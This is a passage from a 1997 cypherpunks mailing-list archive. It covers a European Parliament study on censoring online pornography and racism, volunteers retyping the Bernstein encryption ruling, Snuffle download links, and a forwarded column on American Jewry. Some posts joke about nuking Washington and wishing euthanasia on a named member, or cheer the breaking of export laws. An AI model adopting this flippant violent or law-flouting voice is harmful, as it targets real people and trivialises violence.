regulations to electronic money as for physical cash; -- make use of the available technology to ensure the integrity of electronic records; and, -- examine the electronic commerce distribution chains for new intermediaries. The ATO said there was potential for the Internet to cause difficulties in identifying parties behind Internet businesses. It was also possible that businesses would be able to store tax records offshore or to alter them without trace. The Internet could also lead to the removal of tax collection points in the distribution chain from producer to consumer. The report said its recommendations were designed to help the ATO avoid these problems. Copyright, Reuters Ltd. All rights reserved _________________________________________________________________ ________________________ ___________ [20]Help _________________________________________________________________ Previous Story: [21]SkyBridge Applies With U.S. For Satellite Network Next Story: [22]Altera Tumbles After Sales Warning, Others Follow _________________________________________________________________ [ [23]Index | [24]News | [25]World | [26]Biz | Tech | [27]Politic | [28]Sport | [29]Scoreboard | [30]Entertain | [31]Health ] _________________________________________________________________ Reuters Limited [32]Questions or Comments References 1. LYNXIMGMAP:http://www.yahoo.com/headlines/970829/tech/stories/tax_1.html#reuters 2. http://www.yahoo.com/ 3. http://www.yahoo.com/text/suggest.html 4. http://www.yahoo.com/text/search.html 5. http://www.yahoo.com/text/docs/info/ 6. http://www.yahoo.com/text/headlines/ 7. http://www.yahoo.com/text/headlines/news/ 8. http://www.yahoo.com/text/headlines/international/ 9. http://www.yahoo.com/text/headlines/business/ 10. http://www.yahoo.com/text/headlines/tech/ 11. http://www.yahoo.com/text/headlines/politics/ 12. http://www.yahoo.com/text/headlines/sports/ 13. http://sports.yahoo.com/ 14. http://www.yahoo.com/text/headlines/entertainment/ 15. http://www.yahoo.com/text/headlines/health/ 16. http://www.yahoo.com/headlines/wired/ 17. http://headlines.yahoo.com/zdnews/ 18. http://www.yahoo.com/text/headlines/970829/tech/stories/skybridge_1.html 19. http://www.yahoo.com/text/headlines/970829/tech/stories/altera_1.html 20. http://www.yahoo.com/docs/info/news_search_help.html 21. http://www.yahoo.com/text/headlines/970829/tech/stories/skybridge_1.html 22. http://www.yahoo.com/text/headlines/970829/tech/stories/altera_1.html 23. http://www.yahoo.com/text/headlines/ 24. http://www.yahoo.com/text/headlines/news/ 25. http://www.yahoo.com/text/headlines/international/ 26. http://www.yahoo.com/text/headlines/business/ 27. http://www.yahoo.com/text/headlines/politics/ 28. http://www.yahoo.com/text/headlines/sports/ 29. http://sports.yahoo.com/ 30. http://www.yahoo.com/text/headlines/entertainment/ 31. http://www.yahoo.com/text/headlines/health/ 32. http://www.yahoo.com/docs/info/news_faq.html From 3umoelle at informatik.uni-hamburg.de Fri Aug 29 16:25:58 1997 From: 3umoelle at informatik.uni-hamburg.de (Ulf =?iso-8859-1?Q?M=F6ller?=) Date: Sat, 30 Aug 1997 07:25:58 +0800 Subject: Feasibility of censoring and jamming pronography and racism in informatics Message-ID: A European parliament study evaluating `Feasibility of censoring and jamming pronography and racism in informatics': "SUBSCRIBER PROTECTION: In this scenario [...] it would be necessary for access providers to use firewall and PICS technology (in some instances implemented with in proxy applications) to implement a management regime consistent with provisions for protection of society as in other media, ie media parity. Implementation on this basis would be necessary to ensure subscribers could not tamper with management settings. The impact of implementing the necessary technology on the operating economics of access providers appears to be small. That technologies of these types have already been employed by access provider organisations [...] could potentially be considered to confirm this." From: kris at koehntopp.de (=?ISO-8859-1?Q?Kristian_K=F6hntopp?=) Newsgroups: de.soc.zensur Europarl: STOA Homepage http://www.europarl.eu.int/dg4/stoa/en/default.htm Europarl: STOA Publications http://www.europarl.eu.int/dg4/stoa/en/publi/publi.htm Europarl: STOA Workplan 1996 http://www.europarl.eu.int/dg4/stoa/en/wp96.htm A. Information and telecommunications policy options A.LP.2 INTERNET AND MULTIMEDIA IN THE INFORMATION SOCIETY (In cooperation with the specific research programme of DGIV: REX/Internal Market/New technology/STOA) Sub-projects: (iv) Technical feasibility of jamming or censoring pornography and racism in informatics - Civil liberties ------------------------------------------------------------------------------ STOA European Parliament * Batiment Schuman Bureau 4/82 L-2929 Luxembourg Luxembourg Phone: +352 4300-2511 Fax: +352 4300-2418 * Batiment Eastman Bureau 113 B-1047 Brussels Belgium Phone: +322 284-3747 Fax: +322 284-9059 Email the STOA Team in Luxembourg at _STOA at europarl.eu.int_ Email the STOA Team in Brussels at _ksercu at europarl.eu.int_ ------------------------------------------------------------------------------ This document is a working Document for the 'STOA Panel'. It is not an official publication of the STOA. This document does not necessarily represent the views of the European Parliament. Feasibility of censoring and jamming pronography and racism in informatics ***DRAFT*** Final Report Luxembourg, May 1997, PE number: 166 658 7 Conclusions 7.1 Technical Feasibility 7.1.1 The central question posed to this study is whether it is technically feasible to use the content managment technology to censor and jam pornography and racism on the Internet. 7.1.2 It is concluded that available technology does no and is not likely to provide any satisfactory means for automatically classifying such material. Such judgements will therefore have to be made by humans. 7.1.3 Once such judgements are made, however, technology provides for these judgements to be distributed and used by content managment systems to make the following content managment actions feasible (in principle) to a high degree: - subscriber choice, in that individuals can choose the extent to which they permit or exclude such material on their own behalf or on behalf of others for whom they have responsibility; - subscriber protection, in that precautions against unintentional or unsolicited exposure to such material can be implemented as defined by statute or other form of code or regulation; - prevention of Internet abuse, in that it is possible to detect the exchange of such material within closed groups of offenders to a very substantial extent; - detection of offenders, in that offenders can be identified when offences have been detected or notified involving sites and services where the user has explicitly authenticated identity; - flexible and multi-cultural implementation of content management, in that content management policies can be defined: - to meet the requirements of very small subscriber groups, eg. selected subscribers or a selected group of terminals; - differentially for different types of Internet service, eg Web access and e-mail; - to meet the needs of one culture with respect to the material originating from another without the cooperation of the originator; 7.1.4 The principal technical limitations in these capabilities are: - automated content classification systems can not, because of the complexity of legal definitions, identify Internet content to be racist, pornographic, illegal or harmful - hence this classification must be made by human judgement; - the potential flexibility and coverage offered by the technology can not be achieved in full, at present, because - currently implementations of the key technology (PICS) in Internet applications is incomplete and hence the ratings information can not yet be used to manage all types of Internet content explicitly; - ratings databases are currently incomplete in terms of the types of service they consider and the full range of Internet services available; - it can not be absolutely guaranteed that Internet anonymity services can not be used to frustrate detection of offenders in certain circumstances. 7.1.5 The principal practical issues involved in implementing these technologies are: - defining rating systems which are sufficiently explicit regarding content managment requirements to allow automatic content management whilst still being: - practical to apply to large volumes of information; - meaningful outside the culture in which they are originally applied; - funding the large effort required to categorise the huge and growing volumes of Internet content. 7.2 Implications of policy scenarios 7.2.1 The study investigated the following policy scenarios: Subscriber choice 7.2.2 In this scenario, essentially the status quo, subscribers would either coose to exercise explicit controls over their Internet experience, eg through the use of parental control software, or not. Potentially, subscribers could elect to implement management regimes consistent with privision for protection of society as in other media, ie to provide media parity, but this could not be enforced. 7.2.3 Currently, the technical capability of these products is increasing as vendors invest in the development of new facilities. In the longer term, however, it is not clear that the current subscriber uptake of such tools (on a purely discretionary basis) will sustain their development or the maintenance of databases upon which they depend on a long term basis. 7.2.4 The principal social objection to this policy scenario is that it does not in any way act to reduce abuse either on the Internet or in the 'real' world. The principal legal issue which arises is that it does not provide for media parity. Subscriber protection 7.2.5 In this scenario, subscribers would continue to have the option to exercise management controls accordings to their preferences - potentially including screening unsolicited communications from 'strangers' or anonymous sites. In addition, however, it would be necessary for access providers to use firewall and PICS technology (in some instances implemented with in proxy applications) to implement a management regime consistent with provisions for protection of society as in other media, ie media parity. Implementation on this basis would be necessary to ensure subscribers could not tamper with management settings. 7.2.6 The impact of implementing the necessary technology on the operating economics of access providers appears to be small. That technologies of these types have already been employed by access provider organisations (without discernible impact on end-user charges) could potentially be considered to confirm this. 7.2.7 The principal legal issues which arise in this scenario are: - the liabilities of those who apply labels to content provided by others; - the liabilities of those who are charged with implementing content management on the basis of labels applied by others; - the potential for content labelling providing a legal obstacle to free trade. 7.2.8 These legal issues potentially have substantial social impact in that: - if liabilities are potentially large, those who accept them, either through compiling ratings databases or providing Internet access service, are likely to be very conservative with respect to the material with which they will deal; - international e-commerce in certain services may be compromised by nations exploiting differences in ratings procedures as a pretext for blocking material originating from other countries. Preventing Internet abuse 7.2.9 It is concluded that only implementation of the most intrusive surveillance technology could be exspected to impact heavily upon abuse of the Internet on committed offenders (because of their ready access to strong encryption and covert communication technologies). To enable this policy scenario, it would be necessary for access providers to constrain the equipment used by subscribers to access the Internet to be such that: - no content could be removed; - all content and processing could be subject to automatic and manual surveillance. 7.2.10 The technical and economic feasibility of the necessary technology is evidenced by the emergence, with purely commercial motivations, of technical systems which privde the basic facilities required to implement the necessary measures. It is notes that this coincidental emergence of such systems may raise siginificant privacy issues outside of the scope of this study. The economics of manual surveillance, however, can not be assessed. 7.2.11 This technical approach is, however, completely non-specific in the terms of the subject of censorship which could be implemented and in the scope of (potentially private) material to which surveillance access would be required. It therefore seems highly unlikely that, when the commercial implications, legal obstacles and social objections are considered, application of this technology in this way can be considered a proportionate general response. 7.2.12 Finally, it seems highly probable that the principal of impact of implementation of these measures, if they were to be implemented generally and were found to be effective, would be to displace abuse to other communications means. Detecting offenders 7.2.13 If access providers and service providers maintain proper subscriber authentication systems and system management environments, offending actions at the site to which the subscriber authenticates can be traced to the offender. Detection of offenders committing offences 'at a distance' (ie a subscriber in a country committing an offence in another), however, would require: - access and service providers to take steps to ensure subscriber identity information is carried in their transmissions; - monitoring of services provided on the Internet to prevent subscribers misusing anonymity services to remove such information. 7.2.14 Whilst a variety of means exist to attach identity information, detection of anonymity services is not straightforward. However, monitoring such services would be exspected to limit the number available for overt, eg to transmit offensive material to innocent parties, offensive use. 7.2.15 Legally, handling offences detected through voluntary authentication would be relatively straightforward as the offending subscriber would be resident in the country where the offence was committed. However, offences can only be detected through forced identification, ie those committed 'at a distance', would currently be subject to extradition arrangements and it is not clear that new opportunities for prosecution would arise in practice. Meanwhile, it may be that the social implications of forced and general identification of Internet subscribers would leave subscribers open to a variety of forms of intrusion on privacy and discrimination. 7.3. Options for action at Member State level 7.3.1 It is concluded that, in technical terms, Member States could implement combinations of the technical measures identified in this report according to their own perceptions of harm and proportionality of response in accordance with principles of media parity. This could, technically, be achieved without the cooperation of any external party and provide for different levels of content management according the requirements/vulnerabilities of individual subscriber groups. 7.3.2 The principal potential implications for a member state adopting measures at variance with international norms would be: - obtacles to free trade, including possible infringement of Single Market requirements; - reduced availability of Internet content; - having to bear the costs of maintaining classifications of Internet content alone. 7.4 Options for action at European level 7.4.1 It is concluded that cooperation at the European level could mitigate the implications of uni-lateral action by Member States if action were taken to establish a common content management system. This would comprise: - technical standards in the definition of rating systems to minimise costs of researching Internet content and spread them over the largest possible population; - regulations for harmonisation in the application of agreed standards to ensure that their use did not lead to artifical obstacles in trade; - technical standards in the implementation of content selection mechanisms in Internet applications to ensure that ratings information can be used in a consistent and appropriate way. From mech at eff.org Fri Aug 29 16:44:07 1997 From: mech at eff.org (Stanton McCandlish) Date: Sat, 30 Aug 1997 07:44:07 +0800 Subject: VOLUNTEERS NEEDED for keying in Bernstein docs Message-ID: <199708292324.QAA01922@eff.org> Our copies of the Bernstein case docs are too low-quality to scan, so we're asking for volunteers to help key them in. Most of you all can type fast and could probably spare a few minutes. If you'd like to help with a page or more please drop me a line and tell me how many pages you'll do, and I'll assign you some page numbers. We have images of the docs from a captured fax at http://www.eff.org/bernstein/Legal/970825_decision.images/ and http://www.eff.org/bernstein/Legal/970827_stay_motion.images/ Thanks for any help! -- Stanton McCandlish mech at eff.org Electronic Frontier Foundation Program Director http://www.eff.org/~mech +1 415 436 9333 x105 (v), +1 415 436 9333 (f) Are YOU an EFF member? http://www.eff.org/join From gnu at toad.com Fri Aug 29 17:00:06 1997 From: gnu at toad.com (John Gilmore) Date: Sat, 30 Aug 1997 08:00:06 +0800 Subject: Want to help put Judge Patel's decision on the web? Message-ID: <199708292351.QAA23568@toad.com> We tried running it through OCR software and the results were worse than just typing it in. So we're asking for your help. Please pick a random page of the document and type it in as ordinary text. We'll proofread it and fix up the strange characters and such. Mail the result to me (gnu at toad.com) and post a one-line note to cypherpunks that says "Patel decision page XX handled". If a few get typed twice, it'll be useful for proofreading anyway. The document is on the Web at http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS/Legal/970825_decision.images We reworked the original fuzzy images so they're much easier to read now. But that's still no substitute for real, searchable, small, ordinary text. Please type it like this: * Break the lines in the same place as in the original text. * That funny "S-like" squiggle translates as "Sec." (for section). * That funny "P-like" squiggle translates as "Para." (for paragraph). * Any other stuff you don't understand, do your best, then add "XXX", which we'll search for and fix up. Thanks to everyone who helps! John From jya at pipeline.com Fri Aug 29 17:06:41 1997 From: jya at pipeline.com (John Young) Date: Sat, 30 Aug 1997 08:06:41 +0800 Subject: Cylink Withdraws Claims in RSA v, PGP Message-ID: <1.5.4.32.19970829234831.00721f70@pop.pipeline.com> VM has pointed out that RSA put a letter on its Web site yesterday from Caro-Kann withdrawing its claims in the RSA v. PGP suit. The letter is a GIF file, and VM has made a transcript of it and provided commentary on the case and what is now in the offing: http://jya.com/rsavpgp-ckc.htm From jmr at shopmiami.com Fri Aug 29 17:21:33 1997 From: jmr at shopmiami.com (Jim Ray) Date: Sat, 30 Aug 1997 08:21:33 +0800 Subject: Feasibility of censoring and jamming pronography and racism in informatics Message-ID: <3.0.16.19970829200959.30f7c528@pop.gate.net> -----BEGIN PGP SIGNED MESSAGE----- At 09:54 PM 8/29/97 +0200, Ulf M�ller wrote about: >A European parliament study evaluating `Feasibility of censoring and >jamming pronography and racism in informatics': ... >7.1.2 It is concluded that available technology does no and is > not likely to provide any satisfactory means for > automatically classifying such material. Such judgements > will therefore have to be made by humans. The perfect kind? (One wonders what sort of humans would be drawn to such a job, and which humans will choose or be forced to pay them?) ... > - it can not be absolutely guaranteed that Internet > anonymity services can not be used to frustrate > detection of offenders in certain circumstances. Ahh, the double-negatives of understatement. ... >7.2.9 It is concluded that only implementation of the most > intrusive surveillance technology could be exspected to > impact heavily upon abuse of the Internet on committed > offenders (because of their ready access to strong > encryption and covert communication technologies). To > enable this policy scenario, it would be necessary for > access providers to constrain the equipment used by > subscribers to access the Internet to be such that: > > - no content could be removed; > > - all content and processing could be subject to > automatic and manual surveillance. Achtung, information-Juden! >7.2.10 The technical and economic feasibility of the necessary > technology is evidenced by the emergence, with purely > commercial motivations, of technical systems which privde > the basic facilities required to implement the necessary > measures. It is notes that this coincidental emergence of > such systems may raise siginificant privacy issues > outside of the scope of this study. The economics of > manual surveillance, however, can not be assessed. How 'bout "tax-and-spend"? That's an assessment. ... > Detecting offenders > >7.2.13 If access providers and service providers maintain > proper subscriber authentication systems and system > management environments, offending actions at the site to > which the subscriber authenticates can be traced to the > offender. Detection of offenders committing offences 'at > a distance' (ie a subscriber in a country committing an > offence in another), however, would require: > > - access and service providers to take steps to ensure > subscriber identity information is carried in their > transmissions; > > - monitoring of services provided on the Internet to > prevent subscribers misusing anonymity services to > remove such information. This kind of monitoring, were it actually possible to implement, would mean the effective end of anonymity services. Thankfully, it is presently merely a statist pipe dream. >7.2.14 Whilst a variety of means exist to attach identity > information, detection of anonymity services is not > straightforward. However, monitoring such services would > be exspected to limit the number available for overt, eg > to transmit offensive material to innocent parties, > offensive use. Translation: "Shut as many of 'em down as possible." >7.2.15 Legally, handling offences detected through voluntary > authentication would be relatively straightforward as the > offending subscriber would be resident in the country > where the offence was committed. However, offences can > only be detected through forced identification, ie those > committed 'at a distance', would currently be subject to > extradition arrangements and it is not clear that new > opportunities for prosecution would arise in practice. Oh boy - "opportunities for prosecution," WHEEE! > Meanwhile, it may be that the social implications of > forced and general identification of Internet subscribers > would leave subscribers open to a variety of forms of > intrusion on privacy and discrimination. Oh, but "we" can trust Craig Livingstone, Louis Freeh, Aldrich Ames, and the rest of the spies, can't "we." Why am I feeling so worried these days, anyway? JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh. iQEPAwUBNAdktTUhsGSn1j2pAQGolQfPYfomnbZzYDGugsixCOrwWPB4L50VMwzS 8EUnjgJ1f62zMkRjYBZyO62qzYaiVru6mktSsGl6qJnnMXophPnpc9hVMyOHdq1X lWJDG0IRj7/0fffpvk9RKw+DJlFvbI1oKk9b2hCyTnTBgpJeTi4vK3x3zjq2bB3c R0fagEb2/M700q5KZdG4GkctAwYBGJtTs3MooVCVD++HikTTHyITOhFCUBnQmZKP haWyHi7kT9HeHfkd708eXEHSxQLcv5l/Slpbi3wZr0YrcwbzlicTHip1eGGU2Nrq 3mJvf04bMBBWtyEa9jQb+1hUfPzQDVzu/Y/xVBPE/1D9jQ== =EZTV -----END PGP SIGNATURE----- From aba at dcs.ex.ac.uk Fri Aug 29 17:26:05 1997 From: aba at dcs.ex.ac.uk (Adam Back) Date: Sat, 30 Aug 1997 08:26:05 +0800 Subject: Snuffle Availability In-Reply-To: <1.5.4.32.19970829180857.00e5ebd8@pop.pipeline.com> Message-ID: <199708300018.BAA06456@server.test.net> There's another one which has been at: ftp://idea.sec.dsi.unimi.it/pub/crypt/code/snuffle.tar.gz for a long time. Actually if you point a browser at: ftp://idea.sec.dsi.unimi.it/pub/crypt/ you'll find a fine collection of mirrors of whole not-for-export sites replete with DO_NOT_EXPORT warnings etc, plus many other illegally exported stuff. I love the Italians respect for export laws. Adam -- Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 Message-ID: <3538Be22w165w@bwalk.dm.com> Top 10 Ways to Make a Grouchy Old CypherPunk Smile -------------------------------------------------- #10) Find his shoes for him. #9) Buy Kent Crispin a Dr. Kevorkian gift-certificate. #8) Nuke Washington DC #7) #6) #5) #4) #3) #2) #1) [This space reserved for T.C. May] --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Fri Aug 29 17:50:04 1997 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 30 Aug 1997 08:50:04 +0800 Subject: H/W v S/W encryption Constitutional challenge --The Next Generati In-Reply-To: <199708261557.JAA17065@infowest.com> Message-ID: "Attila T. Hun" writes: > > IM[NSH]O, we need a test case that _differentiates_ between > hardware encryption engines and _software_for_encryption (not to be > confused with firmware). Patel rendered an important decision, but > she refrained from establishing national jurisdiction; our only hope > in this instance is further citations as to relevance. Hmm. The patents on algorithms are phrased as patents on a hardware device implementing the algorithm. If the gubmint had a precedent of hardware exports being banned, could they present a software-only export as a part of a hardward/software package? Just thinking. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From landon_dyer at wayfarer.com Fri Aug 29 17:50:37 1997 From: landon_dyer at wayfarer.com (Landon Dyer) Date: Sat, 30 Aug 1997 08:50:37 +0800 Subject: Patel decision page 3 handled Message-ID: <3.0.32.19970829173306.00ab09b0@mail.wayfarer.com> 'nuff said From jya at pipeline.com Fri Aug 29 17:54:55 1997 From: jya at pipeline.com (John Young) Date: Sat, 30 Aug 1997 08:54:55 +0800 Subject: Patel decision pages 1-6 handled Message-ID: <1.5.4.32.19970830003944.006e5d6c@pop.pipeline.com> From ccaputo at alt.net Fri Aug 29 18:11:29 1997 From: ccaputo at alt.net (Chris Caputo) Date: Sat, 30 Aug 1997 09:11:29 +0800 Subject: Want to help put Judge Patel's decision on the web? In-Reply-To: <199708292351.QAA23568@toad.com> Message-ID: Patel decision page 26 handled. Chris From landon_dyer at wayfarer.com Fri Aug 29 18:20:17 1997 From: landon_dyer at wayfarer.com (Landon Dyer) Date: Sat, 30 Aug 1997 09:20:17 +0800 Subject: Patel decision page 24 handled Message-ID: <3.0.32.19970829180610.00aaf700@mail.wayfarer.com> wheee! -landon From ccaputo at alt.net Fri Aug 29 18:30:07 1997 From: ccaputo at alt.net (Chris Caputo) Date: Sat, 30 Aug 1997 09:30:07 +0800 Subject: Want to help put Judge Patel's decision on the web? In-Reply-To: <199708292351.QAA23568@toad.com> Message-ID: Patel decision page 27 handled Chris From ccaputo at alt.net Fri Aug 29 18:47:37 1997 From: ccaputo at alt.net (Chris Caputo) Date: Sat, 30 Aug 1997 09:47:37 +0800 Subject: Want to help put Judge Patel's decision on the web? In-Reply-To: <199708292351.QAA23568@toad.com> Message-ID: Patel decision page 25 handled. Chris From JonWienk at ix.netcom.com Fri Aug 29 18:49:39 1997 From: JonWienk at ix.netcom.com (Jonathan Wienke) Date: Sat, 30 Aug 1997 09:49:39 +0800 Subject: Sit, Bubu. Sit! / Re: Stay issued; modified stay to follow In-Reply-To: <3406440E.724F@toad.com> Message-ID: <3.0.3.32.19970829180010.006d5330@popd.netcruiser> At 09:03 AM 8/29/97 -0700, Dan Goodin wrote: >I'm very interested in finding out how extensively Snuffle was posted >during the two-and-a-half days it was legal to do so. Do you have any idea >how many sites posted it, and if it's still available online today, now >that such posts are once again against the law? > >Please respond ASAP. > >Thanks, > >Dan Goodin >415-395-7805, x5223 >dang at cnet.com I posted Snuffle to the Coderpunks list: Date: Tue, 26 Aug 1997 18:25:10 -0700 To: coderpunks at toad.com From: Jonathan Wienke Subject: Snuffle! (In celebration of the Bernstein decision) Sender: owner-coderpunks at toad.com [Snuffle source code deleted, check Coderpunk archives for details.] I don't know how many foreigners subscribe to the list, but I have see postings from UK, Australia, and India. Jonathan Wienke What part of "the right of the people to keep and bear Arms, shall not be infringed" is too hard to understand? (From 2nd Amendment, U.S. Constitution) When everyone is armed, criminals fear everyone, not just the police. PGP 2.6.2 RSA Key Fingerprint: 7484 2FB7 7588 ACD1 3A8F 778A 7407 2928 DSS/D-H Key Fingerprint: 3312 6597 8258 9A9E D9FA 4878 C245 D245 EAA7 0DCC Public keys available at pgpkeys.mit.edu. PGP encrypted e-mail preferred. US/Canadian Windows 95/NT or Mac users: Get Eudora Light + PGP 5.0 for free at http://www.eudora.com/eudoralight/ Get PGP 5.0 for free at http://bs.mit.edu:8001/pgp-form.html Commercial version of PGP 5.0 and related products at http://www.pgp.com Eudora Light + PGP = Free, Convenient Communication Privacy -------------- next part -------------- A non-text attachment was scrubbed... Name: pgp00007.pgp Type: application/octet-stream Size: 237 bytes Desc: "PGP signature" URL: From ichudov at Algebra.COM Fri Aug 29 19:16:01 1997 From: ichudov at Algebra.COM (Igor Chudov @ home) Date: Sat, 30 Aug 1997 10:16:01 +0800 Subject: Fate of Jews in America (fwd) Message-ID: <199708300200.VAA22335@manifold.algebra.com> ----- Forwarded message from nikst ----- >From nikst at glasnet.ru Fri Aug 29 20:52:44 1997 Message-Id: X-SMTP-Spy: Real message sender is nikst at glasnet.ru via ppp686.glas.apc.org From: "nikst" Subject: Sud'ba yevreyev v Amerike Date: Sat, 30 Aug 1997 05:40:27 +0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=Windows-1251 THE WASHINGTON TIMES August 29, 1997 The end for U.S. Jewry? By Richard Grenier You know this is a Protestant country," Franklin D. Roosevelt once said to economist Leo Crowley and Henry Morgenthau, his treasury secretary, "and the Catholics and Jews are here under sufferance. It is up to you to go along with anything I want." ... . . . The Presidency of Jack Kennedy abolished forever the notion that American Catholics are here under sufferance. And Jews? On this 100th anniversary of the founding of the Zionist movement, the position of our Jewish minority is singular. The danger for Jews, oddly, is that in the foreseeable future they might be so well assimilated they become extinct. ..... . . . This might surprise many gentiles as never before have so many Jews occupied high positions in American politics, giant corporations, the media, the academy, science, law, medicine, intellectual life, not to mention Wall Street. Both U.S. senators from California are Jews, and last year a Jew, Sen. Arlen Specter, was a serious candidate for the presidency. A generation ago this would have been unthinkable. .... . . . But the eminence of our Jewish high-achievers is deceptive. Not long ago Jews represented something under four percent of the American population. Today they represent two percent. Jews once lived in dense urban settlements in the Northeast, half of them in New York alone. Today 40 percent of Jews live in the South and West. In Denver and Phoenix the intermarriage rate with gentiles is 72 percent -- the harbinger of doom. For as the Jewish population spreads over the country, and assimilates ever more readily, synagogue affiliation declines steadily. ...... . . . Of the 6.8 million people of Jewish descent in this country, almost 20 percent are now practicing Christians, and another 16 percent profess no religion and consider themselves secular Jews or not Jews at all. For centuries persecution paradoxically helped preserve Judaism, while many Jews now expect that tolerance, in the end, will do them in. ... . . . Elliott Abrams, assistant secretary of state under Ronald Reagan and now president of the Ethics and Public Policy Center, alarmed by this drift, has just published a brilliant book, "Faith or Fear" (The Free Press). In Mr. Abrams' view, Jews in America, as things are going, are headed straight for extinction. The only thing that will preserve them, he writes, is true religious faith. Without it they're in danger of disappearing like the ten lost tribes of ancient Israel. ...... . . . Meanwhile, a special issue of The New Republic has appeared devoted to "Zionism at 100." The magazine's editor-in-chief, Martin Peretz has written a grand celebratory article on "The God That Did Not Fail." Mr. Peretz once told me he doesn't believe in God but believes in "the Jewish people," describing for me the funeral service for an eminent Jew during which a friend whispered to him, "Do you realize that of the country's ten leading micro-biologists (I forget the profession) eight are in this room?" To which Mr. Peretz replied pungently, "Praying to a God in whom they do not believe." .... . . . Mr. Peretz is thus a splendid, highly articulate example of Mr. Abrams' "secular Jew" -- and a passionate zionist. Indignant at people who believe that the state of Israel would never have come into being if it hadn't been for the Holocaust, he declares with deep regret that but for the Holocaust there would now be in the world, not 13 million Jews, but "scores of millions." At the end of World War II the gates of Israel would have been stormed, not by thousands of Jews, but by millions. The god that failed, of course, was communism. Whereas zionism grew and triumphed. ...... . . . Supreme Court Justice Louis Brandeis was the most prominent American to hold high position in our government while throwing himself heart and soul into the zionist movement. Brandeis refused to resign from the Court to assume the titular leadership of the World Zionist Organization because he wanted to demonstrate that there was no contradiction between remaining "attached to America while working for a Jewish homeland in Palestine." Justice Brandeis saw no conflict in his position: holding high office in America while deeply involved in the political, financial, and intellectual affairs of a nation in the making --which was after all to become a foreign country. I'm not sure how many Americans today would agree with him. .... . . . But the question isn't what other Americans would think of this kind of double allegiance, or whether the two allegiances might some day be in conflict, but whether Jews, without God, defining themselves as simply an ethnic subgroup, will even survive. One of the reasons there has been such loss of religious faith among America's Jews lies in the nature of their religious practices, to which the practices of Islam (Sunni) bear a strong resemblance: circumcision, prayer, special dietary rules, no pork, no graven images, no musical instruments in the house of worship, concentration on living a godly life here below with little talk of the hereafter and absolutely no messianic talk of eternal life. .... . . . I thus fully agree with Mr. Abrams. Jews will certainly survive in America for a time, but without God, on their present course, they'll eventually be gone. *************** "Bednaya-bednaya" Amerika! U nas ne tak. I eto xorosho illustriruyet sleduyushchij anekdot: Umirayet staryj armyanin. I vot sobral on vsyu svoyu bol'shuyu semyu u svoyego smertnogo lozha. Oni vse dumali, chto rech pojdyot o nasledstve. No tot povyol rech o drugom. K udivleniyu sobravshixsya, on stal goryacho ubezhdat' ix: "Beregite yevreyev!" "Beregite yevreyev!" I kogda on zametil udivlenie na licax sobravshixsya, on iz poslednix sil poyasnil: "Kogda ischeznet poslednij yevrej, oni voz'mutsya za nas, armyan"... I ispustil dux. Tut vot pishut, chto v Amerike, vrode, k etomu idyot. Neuzheli pravda?..;-) *************** RFE/RL NEWSLINE Vol 1, No. 106, Part I, 29 August 1997 ARMENIAN, RUSSIAN PRESIDENTS SIGN TREATY. Levon Ter- Petrossyan and Yeltsin, meeting on the second day of Ter- Petrossyan's state visit to Moscow, signed a treaty on friendship, cooperation, and mutual assistance, Russian media reported on 29 August. Yeltsin commented that the treaty "meets the vital and lasting interests of the two states." The two leaders also signed several agreements, including on the transit of oil across Armenia. ************* K chemu by eto? ----- End of forwarded message from nikst ----- - Igor. From ant at notatla.demon.co.uk Fri Aug 29 19:31:13 1997 From: ant at notatla.demon.co.uk (Antonomasia) Date: Sat, 30 Aug 1997 10:31:13 +0800 Subject: Patel decision page 19 handled Message-ID: <199708300145.CAA02333@notatla.demon.co.uk> Patel decision page 19 handled -- ############################################################## # Antonomasia ant at notatla.demon.co.uk # # See http://www.notatla.demon.co.uk/ # #### !!! PGP 5.0 beta available now at ftp.replay.com !!! #### From landon_dyer at wayfarer.com Fri Aug 29 19:31:35 1997 From: landon_dyer at wayfarer.com (Landon Dyer) Date: Sat, 30 Aug 1997 10:31:35 +0800 Subject: Patel decision page 9 handled Message-ID: <3.0.32.19970829183715.00abed90@mail.wayfarer.com> From kent at songbird.com Fri Aug 29 19:46:22 1997 From: kent at songbird.com (Kent Crispin) Date: Sat, 30 Aug 1997 10:46:22 +0800 Subject: Patel decision pages 2,12,22 handled In-Reply-To: <1.5.4.32.19970830003944.006e5d6c@pop.pipeline.com> Message-ID: <19970829193501.35380@bywater.songbird.com> From landon_dyer at wayfarer.com Fri Aug 29 20:06:50 1997 From: landon_dyer at wayfarer.com (Landon Dyer) Date: Sat, 30 Aug 1997 11:06:50 +0800 Subject: Patel decision page 17 handled Message-ID: <3.0.32.19970829195005.00947230@mail.wayfarer.com> From miner333 at dogbert.xroads.com Fri Aug 29 20:12:14 1997 From: miner333 at dogbert.xroads.com (miner) Date: Sat, 30 Aug 1997 11:12:14 +0800 Subject: patel page 33 done Message-ID: From landon_dyer at wayfarer.com Fri Aug 29 20:16:30 1997 From: landon_dyer at wayfarer.com (Landon Dyer) Date: Sat, 30 Aug 1997 11:16:30 +0800 Subject: Patel decision page 12 handled Message-ID: <3.0.32.19970829192511.009096d0@mail.wayfarer.com> From landon_dyer at wayfarer.com Fri Aug 29 20:31:00 1997 From: landon_dyer at wayfarer.com (Landon Dyer) Date: Sat, 30 Aug 1997 11:31:00 +0800 Subject: Patel decision page 33 handled Message-ID: <3.0.32.19970829200905.00909ec0@mail.wayfarer.com> From brianbr at together.net Fri Aug 29 20:40:46 1997 From: brianbr at together.net (Brian B. Riley) Date: Sat, 30 Aug 1997 11:40:46 +0800 Subject: Feasibility of censoring and jamming pronography and racism in informatics Message-ID: <199708300333.XAA19281@mx02.together.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 8/29/97 3:54 PM, Ulf M�ller 